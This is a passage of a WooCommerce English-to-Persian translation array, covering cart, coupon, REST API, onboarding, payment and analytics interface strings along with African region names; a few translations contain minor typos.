شوند.','Coupon does not exist in the cart.'=>'کوپن در سبد خرید وجود ندارد.','Unique identifier for the coupon within the cart.'=>'شناسه منحصر به فرد برای کوپن در سبد خرید.','ISO code, or name, for the state, province, or district of the address being shipped to.'=>'کد ISO یا نام ایالت، استان یا ناحیه آدرسی که به آن ارسال می شود.','Second line of the address being shipped to.'=>'خط دوم آدرس در حال ارسال به.','First line of the address being shipped to.'=>'خط اول آدرس در حال ارسال به.','Limit result set to products based on a maximum price, provided using the smallest unit of the currency.'=>'محدود کردن نتایج به محصولات بر اساس حداکثر قیمت، ارائه شده با استفاده از کوچکترین واحد پول.','Limit result set to products based on a minimum price, provided using the smallest unit of the currency.'=>'محدود کردن نتایج به محصولات بر اساس حداقل قیمت، ارائه شده با استفاده از کوچکترین واحد پول.','Customer ID if registered. Will return 0 for guests.'=>'شناسه مشتری در صورت ثبت نام برای مهمان 0 برمی گردد.','Parent term ID, if applicable.'=>'شناسه اصطلاح والد، در صورت وجود.','Quantity left in stock if stock is low, or null if not applicable.'=>'در صورت کم بودن موجودی، مقدار موجود در انبار باقی مانده است، یا اگر موجود نباشد، صفر است.','Price string formatted as HTML.'=>'رشته قیمت به صورت HTML قالب بندی شده است.','Product full description in HTML format.'=>'توضیحات کامل محصول در قالب HTML.','Product short description in HTML format.'=>'توضیحات کوتاه محصول در قالب HTML.','ID of the parent product, if applicable.'=>'شناسۀ محصول والد، در صورت وجود.','"%s" is not available for purchase.'=>'"%s" برای خرید موجود نیست.','The "%1$s" coupon has been removed from your cart: %2$s'=>'کد تخفیف «%1$s» از سبد خرید شما حذف شد: %2$s','"%s" has already been applied and cannot be used in conjunction with other coupons.'=>'کد تخفیف «%s» قبلاً اعمال شده است و نمی‌توان آن را همراه با کدهای تخفیف دیگر استفاده کرد.','Invalid coupons were removed from the cart: "%s"'=>'کدهای تخفیف نامعتبر از سبد خرید حذف شدند: «%s»','Price data provided using the smallest unit of the currency.'=>'داده های قیمت با استفاده از کوچکترین واحد پول ارائه شده است.','List of variation IDs, if applicable.'=>'فهرست شناسه‌های متغیر، در صورت وجود.','Unique identifier (key) for the cart item to update.'=>'شناسه (کلید) منحصر به فرد برای بروز رسانی کالای سبد خرید.','Verify database'=>'اعتبارسنجی پایگاه داده','Invalid category ID.'=>'شناسه دسته نامعتبر است.','Template cache cleared.'=>'حافظه پنهان الگو (Template) پاک شد.','Verify base database tables'=>'جداول پایگاه داده پایه را تأیید کنید','Verify if all base database tables are present.'=>'بررسی کنید که همه جداول پایگاه داده پایه وجود دارد.','This tool will empty the template cache.'=>'این ابزار حافظه پنهان الگو (Template) را خالی می کند.','First order received'=>'اولین سفارش دریافت شد','Database verified successfully.'=>'پایگاه‌داده با موفقیت تایید شد.','The active version of WooCommerce does not support template cache clearing.'=>'نگارش فعال ووکامرس از پاکسازی کش قالب پشتیبانی نمی‌کند.','If your store is based in the EU, we recommend using the EU VAT Number extension in addition to automated taxes. It provides your checkout with a field to collect and validate a customer\'s EU VAT number, if they have one.'=>'اگر فروشگاه شما در اتحادیه اروپا مستقر است، توصیه می‌کنیم علاوه بر مالیات‌های خودکار، از افزونه شماره مالیات بر ارزش افزوده اتحادیه اروپا نیز استفاده کنید. در صورت داشتن شماره VAT اتحادیه اروپا، فیلدی برای پرداخت شما فراهم می کند.','Get real-time order alerts anywhere'=>'هشدارهای سفارش بلادرنگ را در هر کجا دریافت کنید','Get notifications about store activity, including new orders and product reviews directly on your mobile devices with the Woo app.'=>'با برنامه Woo، اعلان‌های مربوط به فعالیت فروشگاه، از جمله سفارش‌های جدید و بررسی محصول را مستقیماً در دستگاه‌های تلفن همراه خود دریافت کنید.','WooCommerce %1$s table creation failed. Does the %2$s user have CREATE privileges on the %3$s database?'=>',,;hlvs ایجاد جدول %1$s ناموفق بود. آیا کاربر %2$s دارای امتیازات CREATE در پایگاه داده %3$s است؟','Collect and validate EU VAT numbers at checkout'=>'شماره های مالیات بر ارزش افزوده اتحادیه اروپا را هنگام پرداخت جمع آوری و تأیید کنید','Verifying database... One or more tables are still missing: '=>'در حال تایید پایگاه داده ... یک یا چند جدول هنوز وجود ندارد: ','You need WooCommerce 4.2 or newer to run this tool.'=>'برای اجرای این ابزار به ووکامرس ۴.۲ یا جدیدتر نیاز دارید.','Clear template cache'=>'پاک کردن حافظه پنهان قالب','Maximum number of items to be returned in result set. Defaults to no limit if left blank.'=>'حداکثر تعداد مواردی که باید در مجموعه نتیجه برگردانده شوند. در صورت خالی ماندن، بدون محدودیت پیشفرض می‌شود.','Start your online clothing store'=>'فروشگاه لباس آنلاین خود را راه اندازی کنید','Do you need help with adding your first product?'=>'آیا برای افزودن اولین محصول خود به کمک نیاز دارید؟','This video tutorial will help you go through the process of adding your first product in WooCommerce.'=>'این فیلم آموزشی به شما کمک می کند تا مراحل اضافه کردن اولین محصول خود را در ووکامرس طی کنید.','Starting a fashion website is exciting but it may seem overwhelming as well. In this article, we\'ll walk you through the setup process, teach you to create successful product listings, and show you how to market to your ideal audience.'=>'راه‌اندازی یک وب‌سایت مد هیجان‌انگیز است، اما ممکن است سخت به نظر برسد. در این مقاله، شما را از طریق فرآیند راه‌اندازی راهنمایی می‌کنیم، به شما یاد می‌دهیم که فهرست‌های محصول موفقی ایجاد کنید، و به شما نشان می‌دهیم که چگونه برای مخاطبان ایده‌آل خود بازاریابی کنید.','The admin note layout has a wrong prop value.'=>'طرح یادداشت مدیریت دارای ارزش پایه اشتباه است.','Watch tutorial'=>'آموزش تماشا کنید','Now that you’ve chosen us as a partner, our goal is to make sure we\'re providing the right tools to meet your needs. We\'re looking forward to having your feedback on the store setup experience so we can improve it in the future.'=>'اکنون که ما را به عنوان شریک انتخاب کرده اید، هدف ما این است که مطمئن شویم ابزارهای مناسبی را برای رفع نیازهای شما ارائه می کنیم. ما مشتاقانه منتظر نظرات شما در مورد تجربه راه اندازی فروشگاه هستیم تا بتوانیم آن را در آینده بهبود ببخشیم.','Share feedback'=>'به اشتراک گذاری بازخورد','Changing eCommerce platforms might seem like a big hurdle to overcome, but it is easier than you might think to move your products, customers, and orders to WooCommerce. This article will help you with going through this process.'=>'تغییر پلتفرم‌های تجارت الکترونیک ممکن است مانع بزرگی برای غلبه بر آن به نظر برسد، اما انتقال محصولات، مشتریان و سفارش‌های خود به ووکامرس آسان‌تر از آن چیزی است که فکر می‌کنید. این مقاله به شما کمک می کند تا این روند را طی کنید.','Do you want to migrate from Shopify to WooCommerce?'=>'آیا می‌خواهید از شاپیفای به ووکامرس مهاجرت کنید؟','WooCommerce Subscriptions allows you to introduce a variety of subscriptions for physical or virtual products and services. Create product-of-the-month clubs, weekly service subscriptions or even yearly software billing packages. Add sign-up fees, offer free trials, or set expiration periods.'=>'اشتراک های ووکامرس به شما امکان می دهد تا انواع اشتراک ها را برای محصولات و خدمات فیزیکی یا مجازی معرفی کنید. کلوپ های محصول ماهانه، اشتراک خدمات هفتگی یا حتی بسته های صورتحساب نرم افزاری سالانه ایجاد کنید. هزینه های ثبت نام را اضافه کنید، دوره های آزمایشی رایگان ارائه دهید یا دوره های انقضا را تعیین کنید.','West Pokot'=>'West Pokot','Wajir'=>'Wajir','Vihiga'=>'Vihiga','Tharaka-Nithi'=>'Tharaka-Nithi','Tana River'=>'Tana River','Taita-Taveta'=>'Taita-Taveta','Siaya'=>'Siaya','Samburu'=>'Samburu','Nyeri'=>'Nyeri','Nyandarua'=>'Nyandarua','Nyamira'=>'Nyamira','Narok'=>'Narok','Nandi'=>'Nandi','Nakuru'=>'Nakuru','Nairobi County'=>'Nairobi County','Murang’a'=>'Murang’a','Mombasa'=>'Mombasa','Migori'=>'Migori','Kakamega'=>'Kakamega','Kajiado'=>'Kajiado','Isiolo'=>'Isiolo','Homa Bay'=>'Homa Bay','Garissa'=>'Garissa','Embu'=>'Embu','Elgeyo-Marakwet'=>'Elgeyo-Marakwet','Bungoma'=>'Bungoma','Bomet'=>'Bomet','Baringo'=>'Baringo','Views'=>'بازدیدها','Uasin Gishu'=>'Uasin Gishu','Turkana'=>'Turkana','Trans Nzoia'=>'Trans Nzoia','Meru'=>'Meru','Marsabit'=>'Marsabit','Mandera'=>'Mandera','Makueni'=>'Makueni','Machakos'=>'Machakos','Lamu'=>'Lamu','Laikipia'=>'Laikipia','Kwale'=>'Kwale','Kitui'=>'Kitui','Kisumu'=>'Kisumu','Kisii'=>'Kisii','Kirinyaga'=>'Kirinyaga','Kilifi'=>'Kilifi','Kiambu'=>'Kiambu','Kericho'=>'Kericho','Visitors'=>'بازدید کنندگان','Features'=>'امکانات','Sorry, there is no note with that ID.'=>'با عرض پوزش، هیچ یادداشتی با آن شناسه وجود ندارد.','Start using new features that are being progressively rolled out to improve the store management experience.'=>'شروع به استفاده از ویژگی‌های جدیدی کنید که به تدریج برای بهبود تجربه مدیریت فروشگاه در حال گسترش است.','Plugins must be a non-empty array.'=>'افزونه‌ها باید آرایه‌ای تهی نباشد.','"%s" is out of stock and cannot be purchased.'=>'"%s» موجود نیست و قابل خرید نیست.','One or more tables required for WooCommerce to function are missing, some features may not work as expected. Missing tables: %1$s.'=>'یک یا چند جدول مورد نیاز برای عملکرد ووکامرس وجود ندارد، برخی از ویژگی‌ها ممکن است آنطور که انتظار می‌رود کار نکنند. جداول موجود نیست: %1$s.','Do you need more info about WooCommerce Subscriptions?'=>'آیا به اطلاعات بیشتری در مورد اشتراک های ووکامرس نیاز دارید؟','There was a problem activating some of the requested plugins.'=>'مشکلی در فعال سازی برخی از افزونه های درخواستی وجود داشت.','There was a problem installing some of the requested plugins.'=>'مشکلی در نصب برخی از افزونه های درخواستی وجود داشت.','Registers whether the note is deleted or not'=>'ثبت می کند که آیا یادداشت حذف شده است یا خیر','Not enough units of %s are available in stock to fulfil this order.'=>'میزان کافی از %s برای ثبت این سفارش در انبار موجود نیست.','Plugins were successfully activated.'=>'پخطاین ها با موفقیت فعال شدند.','The requested plugin `%s`. is not yet installed.'=>'افزونه درخواستی `%s`. هنوز نصب نشده است.','Plugins were successfully installed.'=>'پخطاین ها با موفقیت نصب شدند.','Database tables missing'=>'جدول‌های پایگاه‌داده پیدا نشد','One or more tables required for WooCommerce to function are missing, some features may not work as expected. Missing tables: %1$s. Check again.'=>'یک یا چند جدول مورد نیاز برای عملکرد ووکامرس وجود ندارد، برخی از ویژگی‌ها ممکن است آنطور که انتظار می‌رود کار نکنند. جداول موجود نیست: %1$s. دوباره بررسی کنید.','Missing base tables: %s. Some WooCommerce functionality may not work as expected.'=>'جداول پایه وجود ندارد: %s. برخی از عملکردهای ووکارس ممکن است آنطور که انتظار می رود کار نکنند.','Home'=>'خانه','Marketplace'=>'بازار','Overview'=>'بررسی اجمالی','Take payments with the provider that’s right for you - choose from 100+ payment gateways for WooCommerce.'=>'برای پرداخت با درگاه های مختلف آغاز کنید. از میان بیش از 100 درگاه پرداخت برای ووکامرس می‌توانید انتخاب کنید.','Install plugins'=>'نصب افزونه‌ها','Start accepting payments on your store!'=>'شروع به پذیرش پرداخت‌ها در فروشگاه خود کنید!','Uh oh... There was a problem during the Jetpack and WooCommerce Shipping & Tax install. Please try again.'=>'متاسفانه ... هنگام نصب سرویس های Jetpack و WooCommerce مشکلی بوجود آمده. لطفا دوباره تلاش کنید.','We noticed that there was a problem during the Jetpack and WooCommerce Shipping & Tax install. Please try again and enjoy all the advantages of having the plugins connected to your store! Sorry for the inconvenience. The "Jetpack" and "WooCommerce Shipping & Tax" plugins will be installed & activated for free.'=>'ما متوجه شدیم که در هنگام نصب سرویس های Jetpack و WooCommerce مشکلی ایجاد شده است. لطفا دوباره امتحان کنید و از تمام مزایای اتصال پخطاین ها به فروشگاه خود لذت ببرید! بابت این اتفاق متاسفانه. افزونه های "Jetpack" و "WooCommerce Services" به صورت رایگان نصب و فعال می شوند.','User’s WooCommerce purchased downloads data.'=>'کاربران ووکامرس داده‌های دانلودی خریده‌اند.','User’s WooCommerce access to purchased downloads data.'=>'کاربران ووکامرس به داده‌های دانلودی خریداری شده، دسترسی دارند.','Sofala'=>'Sofala','North East'=>'North East','Greater Accra'=>'Greater Accra','Bono East'=>'Bono East','Bono'=>'Bono','Brong-Ahafo'=>'Brong-Ahafo','Ashanti'=>'Ashanti','Ahafo'=>'Ahafo','Manica'=>'Manica','Inhambane'=>'Inhambane','Cabo Delgado'=>'Cabo Delgado','Western North'=>'Western North','Volta'=>'Volta','Savannah'=>'Savannah','Oti'=>'Oti','Niassa'=>'Niassa','Nampula'=>'Nampula','Maputo'=>'Maputo','Maputo Province'=>'Maputo Province','User’s WooCommerce payment tokens data.'=>'اطلاعات توکن‌های پرداخت کاربران ووکامرس.','User’s WooCommerce orders data.'=>'داده‌های سفارش کاربران ووکامرس.','User’s WooCommerce customer data.'=>'داده مشتری کاربران ووکامرس.','Zambézia'=>'Zambézia','Tete'=>'Tete','Gaza'=>'Gaza','Upper West'=>'Upper West','Upper East'=>'Upper East','Your store\'s uploads directory is browsable via the web. We strongly recommend configuring your web server to prevent directory indexing.'=>'فهرست راهنمای آپلودهای فروشگاه شما قابل مرور از طریق وب است. ما قویاً توصیه می‌کنیم سرور وب خود را برای جلوگیری از نمایه‌سازی فهرست راهنما پیکربندی کنید.','%s() was called before the Action Scheduler data store was initialized'=>'قبل از مقداردهی اولیه‌ی مخزن داده‌ی زمان‌بندی اکشن، تابع ()%s فراخوانی شد','Finish setup'=>'پایان راه اندازی','Take payments via bank transfer.'=>'پرداخت ها را از طریق انتقال بانکی انجام دهید.','Take payments in cash upon delivery.'=>'پس از تحویل به صورت نقدی پرداخت کنید.','Payfast'=>'پرداخت سریع','WooCommerce.com support'=>'پشتیبانی WooCommerce.com','(opens in a new tab)'=>'(در یک زبانه جدید باز می‌شود)','Coupons discounts'=>'کدهای تخفیف','Installed version not tested with active version of WooCommerce %s'=>'نسخه نصب شده با نسخه فعال ووکامرس %s تست نشده است','Apply minimum order rule before coupon discount'=>'حداقل شرایط سفارش را قبل از اعمال کدتخفیف را مشخص کنید','If checked, free shipping would be available based on pre-discount order amount.'=>'در صورت بررسی، حمل و نقل رایگان بر اساس مبلغ سفارش قبل از تخفیف در دسترس خواهد بود.','Visit WooCommerce.com to learn more about getting started.'=>'برای کسب اطلاعات بیشتر درباره شروع به کار، از WooCommerce.com دیدن کنید.','For further assistance with WooCommerce core, use the community forum. For help with premium extensions sold on WooCommerce.com, open a support request at WooCommerce.com.'=>'برای کمک بیشتر در مورد هسته ووکامرس، از تالار گفتمان انجمن استفاده کنید. برای راهنمایی در مورد افزونه های ممتاز فروخته شده در WooCommerce.com، یک درخواست پشتیبانی را در WooCommerce.com باز کنید.','Please visit the subscriptions page and renew to continue receiving updates.'=>'لطفا از صفحه اشتراک‌ها دیدن کنید و برای ادامه دریافت بروز رسانی‌ها را تمدید کنید.','%1$s (update to version %2$s is available)'=>'%1$s (بروز رسانی به نسخه %2$s در دسترس است)','Shipment Tracking'=>'رهگیری مرسوله','Personalize homepage'=>'شخصی‌سازی صفحه اصلی','The plugin could not be activated.'=>'افزونه نمی‌تواند فعال شود.','Shipping Label'=>'برچسب حمل و نقل','Limit stats fields to the specified items.'=>'قسمت‌های آمار را به موارد مشخص محدود کنید.','Personalize your store\'s homepage'=>'صفحه اصلی فروشگاه خود را شخصی سازی کنید','The homepage is one of the most important entry points in your store. When done right it can lead to higher conversions and engagement. Don\'t forget to personalize the homepage that we created for your store during the onboarding.'=>'صفحه اصلی یکی از مهم ترین نقاط ورود به فروشگاه شما است. هنگامی که به درستی انجام شود می تواند منجر به تبدیل و تعامل بالاتر شود. فراموش نکنید که صفحه اصلی را که برای فروشگاه شما ایجاد کرده‌ایم شخصی کنید.','There was an error communicating with the WooPayments plugin.'=>'در برقراری ارتباط با افزونه WooPayments خطایی رخ داد.','Securely accept credit and debit cards on your site. Manage transactions without leaving your WordPress dashboard. Only with WooPayments.'=>'کارت‌های اعتباری و نقدی را در سایت خود به طور ایمن بپذیرید. معاملات را بدون ترک پیشخوان وردپرس خود مدیریت کنید. فقط با WooPayments.','Try the new way to get paid'=>'روش جدید پرداخت را امتحان کنید','It appears one or more database tables were missing. Attempting to re-create the missing table(s).'=>'به نظر می‌رسد یک یا بیش از یکی از جدول‌های پایگاه داده در دسترس نیست. در حال تلاش برای ساخت مجدد جدول‌های از دست رفته هستیم.','Your store is configured to serve digital products using "Redirect only" method. This method is deprecated, please switch to a different method instead.
If you use a remote server for downloadable files (such as Google Drive, Dropbox, Amazon S3), you may optionally wish to "allow using redirects as a last resort". Enabling that and/or selecting any of the other options will make this notice go away.'=>'فروشگاه شما برای ارائه محصولات دیجیتال با استفاده از روش «Redirect Only» پیکربندی شده است. این روش منسوخ شده، لطفا از روش دیگری استفاده کنید.
چنانچه شما از یک سرور ریموت برای فایل‌های دانلودی (مانند گوگل درایو، دراپ‌باکس و آمازون S3) استفاده می‌کنید، شاید با تشخیص خود دوست داشته باشید «مجاز به استفاده از redirects به عنوان آخرین حربه» را فعال کنید. فعال کردن آن و/یا انتخاب هر روش دیگر، باعث خواهد شد که این اخطار برطرف شود.','Mobile app'=>'اپ موبایل','Get started'=>'شروع','Choose theme'=>'انتخاب پوسته','Send targeted campaigns, recover abandoned carts and much more with Mailchimp.'=>'با Mailchimp کمپین‌های هدفمند ارسال، سبدهای خرید رها شده و موارد دیگر را بازیابی کنید.','Set up payments'=>'تنظیم شیوه‌‌‌های پرداخت','Securely accept credit and debit cards with one low rate, no surprise fees (custom rates available). Sell online and in store and track sales and inventory in one place.'=>'کارت‌های اعتباری و نقدی را با یک نرخ پایین، بدون کارمزد تعجب‌آور (نرخ‌های سفارشی موجود) به‌طور امن بپذیرید. فروش آنلاین و در فروشگاه و پیگیری فروش و موجودی در یک مکان.','Choose the payment that you want, pay now, pay later or slice it. No credit card numbers, no passwords, no worries.'=>'پرداخت مورد نظر خود را انتخاب کنید، اکنون پرداخت کنید، بعدا پرداخت کنید یا آن را برش دهید. بدون شماره کارت اعتباری، بدون رمز عبور، بدون نگرانی.','Accept debit and credit cards in 135+ currencies, methods such as Alipay, and one-touch checkout with Apple Pay.'=>'کارت‌های نقدی و اعتباری را با بیش از 135 ارز، روش‌هایی مانند Alipay و پرداخت با یک لمس با Apple Pay بپذیرید.','Store connected successfully.'=>'فروشگاه با موفقیت متصل شد.','Import your products'=>'محصولاتتان را درون‌ریزی کنید','Close dialog'=>'بستن کادر','Dismiss this notice'=>'نادیده گرفتن این اعلان','Average order value'=>'میانگین مقدار سفارش','🎉 Congrats on adding your first product!'=>'🎉 بابت اولین محصولی که اضافه کردید تبریک می‌گویم!','Amount'=>'مقدار','Customer type'=>'نوع مشتری','Gross sales'=>'فروش ناخالص','Plugin status.'=>'وضعیت افزونه.','Plugin name.'=>'نام افزونه.','There was an error connecting to Square.'=>'هنگام اتصال به Square خطایی رخ داد.','Food and drink'=>'غذا و نوشیدنی','Electronics and computers'=>'الکترونیک و رایانه','Home, furniture, and garden'=>'خانه، مبلمان و باغ','Fashion, apparel, and accessories'=>'مد، لباس و لوازم تزئینی','Health and beauty'=>'سلامت و زیبایی','Physical products'=>'محصولات فیزیکی','Edit Order'=>'ویرایش سفارش','Edit Product'=>'ویرایش محصول','CBD and other hemp-derived products'=>'کانابیدیول و سایر محصولات مشتقات گیاه کنف','Disable'=>'غیرفعال','Bookings'=>'رزروها','Analytics'=>'تجزیه و تحلیل','Memberships'=>'اعضا','Task List'=>'فهرست وظیفه','Download your %s Report'=>'دریافت گزارش %s شما','[deleted]'=>'[حذف شده]','Plugin slug.'=>'نامک افزونه.','Edit Coupon'=>'ویرایش کدتخفیف','Profile Setup Wizard'=>'راه اندازی سریع نمایه','If you need to enable or disable the task lists, please click on the button below.'=>'در صورت نیاز به فعال یا غیرفعال کردن فهرست وظایف، لطفا روی دکمه زیر کلیک کنید.','Download your %1$s Report: %2$s'=>'گزارش %1$s خود را دانلود کنید: %2$s','A partial IP address can be passed and matching results will be returned.'=>'یک آدرس آی پی جزئی می تواند منتقل شود و نتایج منطبق برگردانده می شوند.','Action that should be completed to connect Jetpack.'=>'اقدامی که برای اتصال جت پک باید انجام شود.','WooCommerce Onboarding'=>'آماده‌سازی ووکامرس','Current page retrieval should be called on or after the `current_screen` hook.'=>'بازیابی صفحه فعلی باید در هوک `current_screen` یا بعد از آن فراخوانی شود.','IP address.'=>'نشانی اینترنتی.','If you need to enable or disable the extended task lists, please click on the button below.'=>'اگر نیاز به فعال یا غیرفعال کردن لیست وظایف توسعه یافته دارید، لطفا روی دکمه زیر کلیک کنید.','Invalid request. Please pass the match parameter.'=>'درخواست نامعتبر لطفا پارامتر مطابقت را پاس کنید.','There was an error connecting to WooCommerce.com. Please try again.'=>'هنگام اتصال به WooCommerce.com خطایی رخ داد. لطفا دوباره تلاش کنید.','Jetpack is not installed or active.'=>'Jetpack نصب یا فعال نیست.','Sign Up'=>'نام‌نویسی','Industry.'=>'صنعت.','The requested plugin `%s` could not be activated.'=>'افزونه‌های درخواستی `%s` قابل فعال‌سازی نیستند.','Invalid plugin.'=>'افزونهٔ نامعتبر.','Theme status.'=>'وضعیت پوسته.','Theme slug.'=>'نامک پوسته.','Invalid theme %s.'=>'پوسته نامعتبر %s.','The requested theme `%s` could not be installed.'=>'پوسته درخواستی `%s` قابل نصب نیست.','The requested theme could not be activated.'=>'پوسته درخواستی قابل فعال‌سازی نیست.','Content of the note.'=>'محتوای این یادداشت.','Title of the note.'=>'عنوان یادداشت.','Status of note.'=>'وضعیت یادداشت.','Type of note.'=>'نوع یادداشت.','Last Active'=>'آخرین فعالیت','Number of customers.'=>'تعداد مشتریان.','AOV'=>'AOV','The requested theme `%s` could not be installed. Theme API call failed.'=>'پوستۀ درخواستی «%s» قابل نصب نیست. اتصال API پوسته ناموفق بود.','Sorry, you cannot manage themes.'=>'با عرض پوزش، نمی توانید پوسته ها را مدیریت کنید.','Name of the note.'=>'نام یادداشت.','The type of the note (e.g. error, warning, etc.).'=>'نوع یادداشت (برای مثال: خطا، هشدار و...).','%s must contain 2 numbers.'=>'%s باید دارای ۲ عدد معتبر باشد.','%s must contain 2 valid dates.'=>'%s باید دارای ۲ تاریخ معتبر باشد.','Date the note was created.'=>'تاریخ ایجاد یادداشت.','Limit response to objects with a total order spend greater than or equal to given number.'=>'محدود کردن پاسخ به اشیاء با ترتیب کل بیشتر یا مساوی تعداد داده شده.','Limit response to objects with an order count between two given integers.'=>'پاسخ به اشیا را با تعداد مرتبه بین دو عدد صحیح محدود کنید.','Limit response to objects with an order count less than or equal to given integer.'=>'محدود کردن پاسخ به اشیاء با تعداد ترتیب کمتر یا مساوی با عدد صحیح داده شده.','Limit response to objects with an order count greater than or equal to given integer.'=>'محدود کردن پاسخ به اشیاء با تعداد ترتیب بیشتر یا مساوی با عدد صحیح داده شده.','Limit response to objects last active between two given ISO8601 compliant datetime.'=>'محدود کردن پاسخ به اشیاء آخرین فعال بین دو زمان تاریخ مطابق با ISO8601.','Limit response to objects last active after (or at) a given ISO8601 compliant datetime.'=>'محدود کردن پاسخ به اشیاء آخرین فعال بودن پس از (یا در) زمان تاریخ مطابق با ISO8601.','Limit response to objects last active before (or at) a given ISO8601 compliant datetime.'=>'محدود کردن پاسخ به اشیاء آخرین فعال قبل از (یا در) زمان تاریخ مطابق با ISO8601.','ID of the note record.'=>'شناسه ثبت یادداشت.','Extra business extensions to install.'=>'افزونه‌های تجاری اضافی برای نصب.','Average AOV per customer.'=>'میانگین ارزش سفارش برای هر مشتری.','Limit response to objects with specific names.'=>'محدود کردن پاسخ به اشیاء با نام های خاص.','Limit response to objects with a customer field containing the search term. Searches the field provided by `searchby`.'=>'محدود کردن پاسخ به اشیاء دارای فیلد مشتری حاوی عبارت جستجو. فیلد ارائه شده توسط `searchby` را جستجو می کند.','Limit result to items with specified customer ids.'=>'نتیجه را به مواردی با شناسه مشتری مشخص محدود کنید.','Limit response to objects with last order after (or at) a given ISO8601 compliant datetime.'=>'محدود کردن پاسخ به اشیاء با آخرین مرتبه پس از (یا در) زمان تاریخ مطابق با ISO8601.','Limit response to objects with last order before (or at) a given ISO8601 compliant datetime.'=>'محدود کردن پاسخ به اشیا با آخرین مرتبه قبل از (یا در) زمان تاریخ مطابق با ISO8601.','Limit response to objects with an average order spend between two given numbers.'=>'پاسخ به اشیا را با ترتیب متوسط بین دو عدد معین محدود کنید.','Limit response to objects with an average order spend less than or equal to given number.'=>'محدود کردن پاسخ به اشیاء با ترتیب متوسط کمتر یا مساوی تعداد داده شده.','Limit response to objects with an average order spend greater than or equal to given number.'=>'محدود کردن پاسخ به اشیاء با ترتیب متوسط بیشتر یا مساوی تعداد داده شده.','Limit response to objects with a total order spend between two given numbers.'=>'محدود کردن پاسخ به اشیا با سفارش کل بین دو عدد داده شده.','Limit response to objects with a total order spend less than or equal to given number.'=>'محدود کردن پاسخ به اشیا با ترتیب کل کمتر یا مساوی تعداد داده شده.','Limit response to objects with specific countries.'=>'محدود کردن پاسخ به اشیاء با کشورهای خاص.','Limit response to objects excluding emails.'=>'محدود کردن پاسخ به اشیا به استثنای ایمیل.','Limit response to objects including emails.'=>'محدود کردن پاسخ به اشیا از جمله ایمیل.','Limit response to objects excluding specific countries.'=>'محدود کردن پاسخ به اشیاء به استثنای کشورهای خاص.','Whether or not the profile was completed.'=>'اینکه آیا نمایه تکمیل شده است یا خیر.','An array of actions, if any, for the note.'=>'مجموعه ای از اقدامات، در صورت وجود، برای یادداشت.','Whether or not a user can request to be reminded about the note.'=>'اینکه آیا کاربر می تواند درخواست یادآوری در مورد یادداشت کند یا خیر.','Date after which the user should be reminded of the note, if any (GMT).'=>'تاریخی که پس از آن باید یادداشت را در صورت وجود (GMT) به کاربر یادآوری کرد.','Date after which the user should be reminded of the note, if any.'=>'تاریخی که پس از آن باید در صورت وجود یادداشت به کاربر یادآوری شود.','Date the note was created (GMT).'=>'تاریخ ایجاد یادداشت (GMT).','The status of the note (e.g. unactioned, actioned).'=>'وضعیت یادداشت (به عنوان مثال بدون عمل، عمل شده).','Content data for the note. JSON string. Available for re-localization.'=>'داده های محتوای یادداشت رشته JSON. برای محلی سازی مجدد موجود است.','Locale used for the note title and content.'=>'محلی برای عنوان و محتوای یادداشت استفاده می شود.','%1$s is not a numerically indexed array.'=>'%1$s یک آرایه شاخص عددی نیست.','The requested plugin `%s` could not be installed.'=>'افزونه درخواستی `%s` نصب نشد.','Limit response to objects excluding specific names.'=>'محدود کردن پاسخ به اشیاء به استثنای نام‌های خاص.','Limit response to objects excluding specific usernames.'=>'محدود کردن پاسخ به اشیاء به استثنای نام‌های کاربری خاص.','Limit response to objects with specific usernames.'=>'محدود کردن پاسخ به اشیاء با نام‌های کاربری خاص.','There was an error loading the WooCommerce.com Helper API.'=>'هنگام بارگذاری WooCommerce.com Helper API خطایی روی داد.','Postal Code'=>'کد پستی','Product parent name.'=>'نام والد محصول.','Source of the note.'=>'منبع این یادداشت.','Average total spend per customer.'=>'میانگین هزینۀ هر مشتری.','Average number of orders.'=>'میانگین تعداد سفارش‌ها.','Onboarding profile data has been updated.'=>'داده‌های نمایه ورود بروز رسانی شده است.','City.'=>'شهر.','Username.'=>'نام کاربری.','Name.'=>'نام.','User ID.'=>'شناسه کاربر.','(Deleted)'=>'(حذف شده)','%s (Deleted)'=>'%s (حذف شده)','Product(s)'=>'محصول(ها)','Region.'=>'منطقه.','%1$s× %2$s'=>'%1$s× %2$s','Avg order value.'=>'میانگین ارزش سفارش.','Order count.'=>'تعداد سفارش.','Date registered.'=>'تاریخ ثبت.','Product category IDs.'=>'شناسه های دسته محصول.','Date last active.'=>'آخرین تاریخ فعالیت.','Returning or new customer.'=>'مشتری بازگشتی یا جدید.','Average order value.'=>'میانگین مبلغ سفارش.','Number of distinct products sold.'=>'تعداد محصولات متمایز فروخته شده.','Average items per order'=>'میانگین موارد هر سفارش','Net total revenue.'=>'مجموع درآمد خالص.','Order customer information.'=>'اطلاعات سفارش مشتری.','Limit result set to returning or new customers.'=>'مجموعه نتایج را به مشتریان بازگشتی یا جدید محدود کنید.','List of order coupons.'=>'فهرست کدهای تخفیف سفارش‌ها.','Skip importing existing order data.'=>'صرف نظر کردن از درون‌ریزی اطلاعات سفارش موجود.','List of order product IDs, names, quantities.'=>'لیست شناسه های محصول سفارش، نام، تعداد.','Date the order was created, as GMT.'=>'تاریخ ایجاد سفارش، به عنوان GMT.','Date the order was created, in the site\'s timezone.'=>'تاریخ ایجاد سفارش، در منطقه زمانی سایت.','All pending and in-progress import actions have been cancelled.'=>'همه اقدامات وارداتی در انتظار و در حال انجام لغو شده است.','Limit response to objects that don\'t have the specified customer ids.'=>'محدود کردن پاسخ به اشیایی که شناسه مشتری مشخص شده را ندارند.','Limit response to objects that have the specified customer ids.'=>'محدود کردن پاسخ به اشیایی که دارای شناسه مشتری مشخص شده هستند.','Indicates whether all the conditions should be true for the resulting set, or if any one of them is sufficient. Match affects the following parameters: status_is, status_is_not, product_includes, product_excludes, coupon_includes, coupon_excludes, customer, categories'=>'نشان می دهد که آیا تمام شرایط باید برای مجموعه حاصل درست باشد یا هر یک از آنها کافی است. مطابقت بر پارامترهای زیر تأثیر می‌گذارد: status_is، status_is_not، product_includes، product_excludes، coupon_includes، coupon_excludes، مشتری، دسته‌ها','Limit response to objects registered after (or at) a given ISO8601 compliant datetime.'=>'محدود کردن پاسخ به اشیاء ثبت شده پس از (یا در) زمان تاریخ مطابق با ISO8601.','Limit response to objects registered before (or at) a given ISO8601 compliant datetime.'=>'محدود کردن پاسخ به اشیاء ثبت شده قبل از (یا در) زمان تاریخ مطابق با ISO8601.','Date last active GMT.'=>'تاریخ آخرین GMT فعال.','Limit result to items from the specified categories.'=>'نتایج را به مواردی از دسته‌های مشخص شده محدود کنید.','Limit result set to specific types 